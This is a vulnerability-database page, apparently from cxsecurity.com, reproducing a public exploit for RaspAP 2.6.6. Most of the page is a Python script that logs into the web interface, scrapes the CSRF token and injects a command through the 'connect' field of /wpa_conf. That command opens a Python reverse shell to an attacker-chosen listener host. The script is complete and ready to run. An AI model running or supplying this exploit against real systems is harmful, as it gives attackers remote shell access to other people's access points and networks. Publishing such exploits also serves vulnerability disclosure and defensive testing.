RaspAP 2.6.6 Remote Code Execution

2021.08.23
Credit: Moritz Gruber
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: RaspAP 2.6.6 - Remote Code Execution (RCE) (Authenticated) # Date: 23.08.2021 # Exploit Author: Moritz Gruber <moritz@aware7.de> # Vendor Homepage: https://raspap.com/ # Software Link: https://github.com/RaspAP/raspap-webgui # Version: 2.6.6 # Tested on: Linux raspberrypi 5.10.52-v7+ import requests from requests.api import post from requests.auth import HTTPBasicAuth from bs4 import BeautifulSoup import sys, re if len(sys.argv) != 7: print("python3 exec-raspap.py <target-host> <target-port> <username> <password> <reverse-host> <reverse-port>") sys.exit() else: target_host = sys.argv[1] target_port = sys.argv[2] username = sys.argv[3] password = sys.argv[4] listener_host = sys.argv[5] listener_port = sys.argv[6] endpoint = "/wpa_conf" exploit = f"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{listener_host}\",{listener_port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" url = "http://{}:{}/{}".format(target_host,target_port,endpoint) s = requests.Session() get_Request = s.get(url, auth=HTTPBasicAuth(username, password)) soup = BeautifulSoup(get_Request.text, "lxml") csrf_token = soup.find("meta",{"name":"csrf_token"}).get("content") post_data = { "csrf_token": csrf_token, "connect": "wlan; {}".format(exploit) } post_Request = s.post(url, data=post_data, auth=HTTPBasicAuth(username, password)) if post_Request.status_code: print("Exploit send.") else: print("Something went wrong.") print("Done")


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top